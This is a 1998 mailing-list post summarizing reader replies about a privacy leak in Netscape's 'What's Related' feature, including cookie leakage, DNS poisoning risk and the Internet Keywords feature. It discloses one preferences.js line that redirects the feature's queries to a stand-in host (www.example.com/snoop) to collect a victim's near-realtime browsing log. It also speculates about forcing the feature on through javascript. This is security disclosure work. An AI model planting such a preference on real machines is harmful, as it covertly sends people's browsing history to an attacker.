Re: Netscape "What's Related" (summary)

From: Flemming S. Johansen (fsjat_private)
Date: Thu Nov 12 1998 - 06:23:30 PST

    #define WR "What's Related"

    I have received several emails pointing out that the default setting
    for WR is "After first use". Sorry about that mistake.

    I have also received several emails with various suggestions for how to
    block WR info-leak using various web server, firewall or proxy server
    configuration tricks. Thanks guys, I really appreciate the effort. But
    my original posting was more about alerting others to what I see as a
    "torpedo" feature in a commodity application, rather than a cry for
    help. (I had blocked WR in our firewall before posting.)

    John Hensley reports that Netscape-4.07 apparently disables WR if it is
    configured to go through a proxy server. I have not been able to verify
    this since I do not have a proxy server to test against. Can anyone
    confirm or refute this?

    George Hotelling points out that Netscape has a FAQ about WR, at:
    http://home.netscape.com/escapes/related/faq.html, and that WR does not
    send the parameters to a CGI.

    Perry Harrington and Kragen point out that DNS cache poisoning could be
    used to direct the WR lookups to an attacking host. This made me wonder
    just how the netscape binary gets the www-rl.netscape.com hostname. It
    turns out to be a built-in preference: pref("browser.related.provider",
    "http://www-rl.netscape.com/wtgn?"); If the preferences.js file is
    "enhanced" with something like: user_pref("browser.related.provider",
    "http://www.example.com/snoop?");, www.example.com will receive a
    near-realtime surfing log of the victim. I tested this with
    Netscape-4.06, and it seems to work. Of course, it could also enable an
    admin to direct WR queries to a server of his/her choice, without
    messing with a firewall. I wonder if it is possible to modify browser
    preferences with a javascript applet? If so, then setting
    browser.related.autoload to 0 and browser.related.enabled to true will
    force WR to 'always' and 'enabled'.

    Doug Monroe pointed me to a paper he co-authored:
    http://www.interhack.net/pubs/whatsrelated/, which contains a more
    detailed study of the WR implementation. It turns out that the WR
    feature also passes a cookie to www-rl.netscape.com on each query: the
    same cookie you get for all your netscape.com accesses. Doug also
    points out, that Netscape is not alone here: The basic technology was
    developed by Alexa Internet. Alexa still offers a free product with
    essentially the same functionality as WR. The alexa scheme is a bit
    more dynamic than Netscape's: The alexa client queries olin.alexa.com
    for a current list of WR servers. The caution about DNS also applies
    here.

    Dimitry Andric points out that the "Internet Keywords" feature in
    Netscape can also be problematic: It causes the browser to do a
    search-engine query at keyword.netscape.com. This is also a settable
    preference: user_pref("network.search.url", "http://keyword.netscape.com/");
    will do the trick. The caution about DNS also applies here.

    One bit of good news: It seems that WR is disabled automatically for
    https: URLs.

    Some WR links:

    http://home.netscape.com/escapes/related/faq.html
    http://www.interhack.net/pubs/whatsrelated/